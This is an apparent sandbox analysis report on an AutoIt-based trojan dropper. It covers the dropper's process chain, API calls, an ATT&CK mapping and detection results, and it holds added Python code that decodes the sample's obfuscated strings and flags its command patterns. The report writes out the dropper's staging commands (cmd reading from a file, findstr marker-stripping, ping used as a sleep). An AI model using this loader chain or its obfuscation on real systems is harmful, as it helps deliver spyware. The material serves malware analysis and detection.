Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Switch $FtFgHgfSLDQHNz
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d-^
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2923997739.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $xTAygaMnGSysza = 'UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK'
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $FtFgHgfSLDQHNz = 195
Source: Inebriarti.exe.com, 00000008.00000002.2923997739.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc'V'r
Source: Inebriarti.exe.com, 00000005.00000003.1746199416.0000000003B61000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926882914.0000000004310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LDMFBZXYYDKLENPNZTQEMUSNJAKRRSOYSINESZUWMDFQUUCTLKIZVBH
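The Execute(...) calls quoted in the memory strings above, for example Execute(rETgxIUQ("88#121#119#...#44#46",5)), hand a separator-delimited list of integers and a small key to a decoder function whose body the report does not show. The Python below is an added example, not code from the report or from the sample: it assumes the decoder is the subtract-the-key scheme these AutoIt loaders typically use (split on the separator, subtract the key from every number, convert the result to a character) and applies it to the three blobs the report quotes. All three decode to syntactically valid AutoIt, which supports the assumption; the script fragment it parses is constructed from the report's own lines.

```python
import re

# Encoded strings and keys copied from the report's memory-string lines.
BLOB_RETGXIUQ = ("88#121#119#110#115#108#78#120#75#113#116#102#121#45#44#111#109#115#90#105#88#108#103#112#89#114#70#106#103#44#46", 5)
BLOB_GKHRXXDEQ = ("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_77_88_78_126_116_116_131_76_92_48_50", 9)
BLOB_EKRSXFEZU = ("71#117#108#121#104#74#104#119#86#104#117#108#100#111#43#42#92#122#80#120#74#102#88#111#93#42#44", 3)


def decode_autoit_blob(blob: str, key: int) -> str:
    """Assumed decoder (the report does not show the function bodies): split on
    the non-digit separator ('#' or '_' in this sample), subtract `key` from
    every number and map the result to a character."""
    tokens = [t for t in re.split(r"[^0-9]+", blob) if t]
    return "".join(chr(int(t) - key) for t in tokens)


# Matches Execute(<decoder>("<blob>",<key>)) exactly as it appears in the dump.
EXECUTE_CALL = re.compile(r'Execute\((\w+)\("([0-9#_]+)",\s*(\d+)\)\)')


def decode_execute_calls(script_text: str) -> list[tuple[str, str]]:
    """Return (decoder name, decoded expression) for every Execute() call in a
    dumped script fragment, in order of appearance, so the script can be read
    with the encoded expressions resolved."""
    return [(name, decode_autoit_blob(blob, int(key)))
            for name, blob, key in EXECUTE_CALL.findall(script_text)]


# Script fragment constructed from the three script lines quoted in the report.
DUMP_FRAGMENT = (
    f'$VdwHnUJpYBHGiro = Execute(GKHRXxdEq("{BLOB_GKHRXXDEQ[0]}",{BLOB_GKHRXXDEQ[1]})), '
    "$XDDiCUzGlnMH = 'ImcUYqPiljrtfCXuiybhGfsGnP'\n"
    f'Local $mUnGEjvcQyyHiw = Execute(rETgxIUQ("{BLOB_RETGXIUQ[0]}",{BLOB_RETGXIUQ[1]})), '
    "$oMLzKVgHrLiAtG = 'kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF'\n"
    f'$VjItThBcFgJSTh = Execute(ekrSXFezU("{BLOB_EKRSXFEZU[0]}",{BLOB_EKRSXFEZU[1]})), '
    "$LHtIufRxUd = 'rAAViyZFlUnFeoHWSZCenyXOWRCUyyhgfSUBjlm'\n"
)


if __name__ == "__main__":
    for name, expr in decode_execute_calls(DUMP_FRAGMENT):
        print(f"{name}(...) -> {expr}")
```

All three blobs decode to built-in calls on random literals (StringIsFloat('jhnUdSgbkTmAeb'), StringIsFloat('DOEukkzCS'), DriveGetSerial('YwMuGcUlZ')), that is, junk statements whose job is to pad the script and defeat string matching rather than loader logic. Run over a full decompiled script, the same routine separates that padding from the statements that matter.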
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D45D5 BlockInput,5_2_007D45D5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00775240
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00795CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00795CAC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040760A LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,0_2_0040760A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_007B88CD
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078A354 SetUnhandledExceptionFilter,5_2_0078A354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0078A385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00A7A385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7A354 SetUnhandledExceptionFilter,7_2_00A7A354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FA354 SetUnhandledExceptionFilter,11_2_003FA354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_003FA385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B9369 LogonUserW,5_2_007B9369
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00775240
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C1AC6 SendInput,keybd_event,5_2_007C1AC6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C51E2 mouse_event,5_2_007C51E2
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com Inebriarti.exe.com A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com Bonta.exe.com m
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com Pensiero.exe.com E
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
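The process-creation lines above show the dropper's whole chain: cmd.exe fed its commands over stdin (cmd < Seminato.vstm), findstr /V /R printing every line of Pure.vstm except the one matching a long anchored random marker (the report does not show where that output is redirected), three renamed AutoIt interpreters started from the 7ZipSfx temp directory with a one-character argument, and ping 127.0.0.1 -n 30 used as a roughly thirty-second sleep (one echo per second against loopback). As an added example that is not part of the report, the Python below turns those command shapes into rules and runs them over process records constructed from these lines plus one benign ping as a control; the record fields, thresholds and rule names are this example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names are this example's own)."""
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # command line of the created process


# Constructed from the report's "Process created" lines, plus one benign ping
# (the last record) as a control.
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\Tt843YGUx5.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe", "cmd"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com",
              "Inebriarti.exe.com A"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\PING.EXE",
              "ping 127.0.0.1 -n 30"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE",
              "ping 10.0.0.5 -n 2"),
]

# cmd reading its commands from a redirected file instead of a .bat/.cmd argument
STDIN_SCRIPT = re.compile(r"\bcmd(?:\.exe)?\s*<\s*\S+", re.IGNORECASE)
# findstr /V /R "^<long random token>$" <file>: emit every line except the marker
FINDSTR_MARKER = re.compile(r'findstr\s+/V\s+/R\s+"\^[A-Za-z0-9]{40,}\$"\s+\S+', re.IGNORECASE)
# ping against loopback with a large count: one echo per second, i.e. a sleep
PING_SLEEP = re.compile(r"ping\s+(?:127\.0\.0\.1|localhost)\s+-n\s+(\d+)", re.IGNORECASE)
# executable with a stacked extension such as X.exe.com
DOUBLE_EXT = re.compile(r"\.exe\.(?:com|pif|scr)$", re.IGNORECASE)


def classify(ev: ProcEvent, min_sleep: int = 5) -> list[str]:
    """Return the names of the rules an event trips; [] means nothing notable."""
    hits = []
    image = ev.image.lower()
    if image.endswith("cmd.exe") and STDIN_SCRIPT.search(ev.cmdline):
        hits.append("cmd_script_from_stdin")
    if image.endswith("findstr.exe") and FINDSTR_MARKER.search(ev.cmdline):
        hits.append("findstr_strip_marker")
    if image.endswith("ping.exe"):
        m = PING_SLEEP.search(ev.cmdline)
        if m and int(m.group(1)) >= min_sleep:
            hits.append("ping_loopback_sleep")
    if DOUBLE_EXT.search(image):
        hits.append("double_extension_image")
    if "\\7zipsfx." in image and ev.parent.lower().endswith("cmd.exe"):
        hits.append("sfx_temp_child_of_cmd")
    return hits


def chain_rules(events: list[ProcEvent]) -> set[str]:
    """Distinct rules fired across one process tree. Several distinct rules
    under the same cmd.exe parent is the signal; a lone ping or findstr is not."""
    return {rule for ev in events for rule in classify(ev)}


if __name__ == "__main__":
    for ev in EVENTS:
        print(f"{classify(ev) or '-'}  {ev.cmdline[:60]}")
    print("chain rules:", sorted(chain_rules(EVENTS)))
```

Each rule on its own is noisy (administrators do use ping -n as a delay in batch files); the value is in requiring several of them under one cmd.exe parent, which is exactly the shape this chain presents and which an ordinary script rarely does.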
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_007B88CD
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040287D AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040287D
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685402000.0000000000816000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000000.1686613915.0000000000B06000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Inebriarti.exe.com, Bonta.exe.com, Pensiero.exe.comBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078885B cpuid 5_2_0078885B
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_004025C8
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00401899 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401899
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007A0722 GetUserNameW,5_2_007A0722
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0079416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_0079416A
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00405420 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,GetCommandLineW,lstrlenW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405420
Source: Pensiero.exe.comBinary or memory string: WIN_81
Source: Pensiero.exe.comBinary or memory string: WIN_XP
Source: Pensiero.exe.comBinary or memory string: WIN_XPe
Source: Pensiero.exe.comBinary or memory string: WIN_VISTA
Source: Pensiero.exe.comBinary or memory string: WIN_7
Source: Pensiero.exe.comBinary or memory string: WIN_8
Source: Bonta.exe.com, 0000000A.00000000.1689082759.0000000000B06000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_007D696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_007D6E32
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AC696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_00AC696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AC6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_00AC6E32
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0044696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0044696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00446E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00446E32
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 121 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 121 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 Masquerading | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1610406 | Sample: Tt843YGUx5.exe | Startdate: 09/02/2025 | Architecture: WINDOWS | Score: 80
DNS/IP nodes: OreSqbuLLIH.OreSqbuLLIH; OEEMOUIIEJHDT.OEEMOUIIEJHDT; NiXfPuxauHolCHyB.NiXfPuxauHolCHyB
Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Joe Sandbox ML detected suspicious sample
Process tree:
  Tt843YGUx5.exe (11) started
    signature: Contains functionality to register a low level keyboard hook
    cmd.exe (1) started
      signatures: Obfuscated command line found; Uses ping.exe to sleep; Drops PE files with a suspicious file extension; Uses ping.exe to check the status of other devices and networks
      cmd.exe (7) started
        dropped: C:\Users\user\AppData\...\Pensiero.exe.com (PE32); C:\Users\user\AppData\...\Inebriarti.exe.com (PE32); C:\Users\user\AppData\Local\...\Bonta.exe.com (PE32)
        signatures: Obfuscated command line found; Uses ping.exe to sleep
        PING.EXE (1) started -> 127.0.0.1 unknown unknown
        Inebriarti.exe.com started -> Inebriarti.exe.com started
        Pensiero.exe.com started -> Pensiero.exe.com started
        4 other processes -> Bonta.exe.com started
      conhost.exe started

Source | Detection | Scanner | Label
Tt843YGUx5.exe | 31% | Virustotal |
Tt843YGUx5.exe | 45% | ReversingLabs | Win32.Trojan.Generic
Tt843YGUx5.exe | 100% | Avira | TR/Patched.Gen
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | 3% | ReversingLabs |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
OEEMOUIIEJHDT.OEEMOUIIEJHDT | unknown | unknown | false | | unknown
OreSqbuLLIH.OreSqbuLLIH | unknown | unknown | false | | unknown
NiXfPuxauHolCHyB.NiXfPuxauHolCHyB | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685542446.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000002.1753768535.0000000000B19000.00000002.00000001.01000000.00000006.sdmp, Inebriarti.exe.com, 00000008.00000002.2923052469.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 0000000A.00000000.1689206168.0000000000B19000.00000002.00000001.01000000.00000006.sdmp | false | | high
https://www.autoitscript.com/autoit3/ | Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
127.0.0.1 | | | | |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1610406
Start date and time: 2025-02-09 07:58:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Tt843YGUx5.exe (renamed because the original name is a hash value)
Original Sample Name: 0d6bbe5907ca581fec7c452793aa1257.exe
Detection: MAL
Classification: mal80.troj.spyw.evad.winEXE@26/14@3/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 105
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
01:59:06 | API Interceptor | 3558x Sleep call for process: Bonta.exe.com modified
01:59:08 | API Interceptor | 3407x Sleep call for process: Pensiero.exe.com modified
01:59:42 | API Interceptor | 3393x Sleep call for process: Inebriarti.exe.com modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | in.exe | malicious | DarkGate, MailPassView
 | in.exe | malicious | DarkGate, MailPassView
 | KgpiJLs58m.exe | malicious | DarkGate, MailPassView
 | KgpiJLs58m.exe | malicious | DarkGate, MailPassView
 | Notion Setup 4.3.0 (4).exe | malicious | DarkGate, MailPassView
 | Notion Setup 4.3.0 (4).exe | malicious | DarkGate, MailPassView
 | JiH0aUfOU6.exe | malicious | Unknown
